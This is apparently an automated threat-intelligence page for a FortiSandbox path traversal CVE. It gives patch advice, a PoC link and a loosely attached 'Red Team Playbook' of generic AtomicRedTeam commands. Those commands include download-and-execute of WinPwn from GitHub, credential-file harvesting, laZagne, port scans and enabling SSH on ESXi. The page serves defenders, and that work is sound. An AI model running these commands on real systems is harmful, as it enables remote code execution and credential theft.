CVE-2026-39813
Overview
This vulnerability is a path traversal flaw in Fortinet FortiSandbox versions 4.4.0 through 4.4.8 and 5.0.0 through 5.0.5. The root cause lies in improper validation of user-supplied input within HTTP request parameters, allowing directory traversal sequences such as '../filedir' to access unauthorized filesystem locations. The affected component is the HTTP interface of FortiSandbox, which fails to sanitize path inputs correctly, enabling manipulation of file paths beyond intended boundaries.
Vulnerability Description
A path traversal: '../filedir' vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8 may allow attacker to escalation of privilege via specially crafted HTTP requests.
Impact
An unauthenticated attacker can exploit this vulnerability to perform path traversal attacks, gaining unauthorized access to sensitive files on the FortiSandbox system. This can lead to escalation of privileges, allowing the attacker to read or modify critical system files, potentially resulting in full system compromise. The attack requires no user interaction or valid credentials, increasing the likelihood of exploitation in exposed environments. Such access can facilitate lateral movement within a network or disrupt security monitoring capabilities.
Solution
Fortinet has released patches addressing this vulnerability in FortiSandbox versions beyond 5.0.5 and 4.4.8. Administrators should upgrade affected FortiSandbox instances to the latest firmware as detailed in the Fortinet advisory FG-IR-26-112 available at https://fortiguard.fortinet.com/psirt/FG-IR-26-112. The advisory provides specific version numbers and patch instructions. Applying these updates is the recommended remediation to mitigate the path traversal issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Fortinet FortiSandbox, characterized by a path traversal flaw, allows unauthorized access to files outside the intended directory structure. This occurs when an attacker crafts specific HTTP requests that exploit the improper validation of user-supplied input. By manipulating the file path, an attacker can traverse the directory hierarchy, potentially gaining access to sensitive files and executing unauthorized commands. This flaw primarily affects versions 5.0.0 through 5.0.5 and 4.4.0 through 4.4.8 of the FortiSandbox product, which is designed to provide advanced threat protection through sandboxing techniques.
Exploitation of this vulnerability can occur through various attack vectors, primarily focusing on web-based interactions with the FortiSandbox system. An attacker may leverage social engineering tactics to trick a user into clicking a malicious link or directly send crafted HTTP requests to the vulnerable server. Once the attacker successfully manipulates the file path, they can access sensitive configuration files, logs, or other critical data that could lead to privilege escalation. In more severe scenarios, this access could allow the attacker to execute arbitrary code, leading to a complete compromise of the affected system.
The real-world impact of this vulnerability is significant, particularly for organizations relying on FortiSandbox for threat detection and mitigation. A successful exploitation could lead to unauthorized access to sensitive data, including intellectual property, customer information, and internal communications. The potential for privilege escalation poses a considerable business risk, as it may allow attackers to gain administrative access, further compromising the integrity of the entire network. The financial implications of such a breach could be substantial, encompassing costs related to incident response, legal liabilities, and reputational damage.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching FortiSandbox installations is crucial to protect against known vulnerabilities. Additionally, employing web application firewalls (WAF) can help filter and monitor HTTP requests, blocking any attempts to exploit the path traversal flaw. Organizations should also conduct regular security assessments and penetration testing to identify potential weaknesses in their systems. Educating employees about the risks associated with social engineering and phishing attacks can further reduce the likelihood of exploitation.
In conclusion, the path traversal vulnerability in Fortinet FortiSandbox presents a serious threat to organizations utilizing this product for cybersecurity. The ability for an attacker to escalate privileges through crafted HTTP requests underscores the importance of maintaining robust security practices. By prioritizing timely updates, employing advanced security measures, and fostering a culture of security awareness, organizations can significantly mitigate the risks associated with this vulnerability and protect their critical assets from potential exploitation.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-39813, driven by the emergence of publicly available proof-of-concept exploit code. This development has broadened the exploit landscape, lowering the barrier for threat actors to weaponize the vulnerability. Our telemetry indicates a significant uptick in attempts to leverage this path traversal flaw in Fortinet FortiSandbox versions 4.4.0 through 5.0.5, reflecting increased adversary interest and operationalization. The associated EPSS score now places this vulnerability among the higher-risk categories, underscoring its growing likelihood of exploitation in the wild. Consequently, the threat level has escalated from theoretical to active, necessitating heightened vigilance from defenders monitoring network traffic and FortiSandbox deployments. This shift signals that attackers are moving beyond reconnaissance and proof-of-concept stages toward practical exploitation, which could facilitate privilege escalation and compromise of critical security infrastructure.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortisandbox | All |
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
HORKimhab/CVE-2026-39813
CVE-2026-39813 - Fortinet Sandbox - Draft
|
HORKimhab | 0 | 1 | 2026-06-17 | View |
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Active exploitation confirmed — vendor: Fortinet, product: fortisandbox
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-39813 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-26-112 |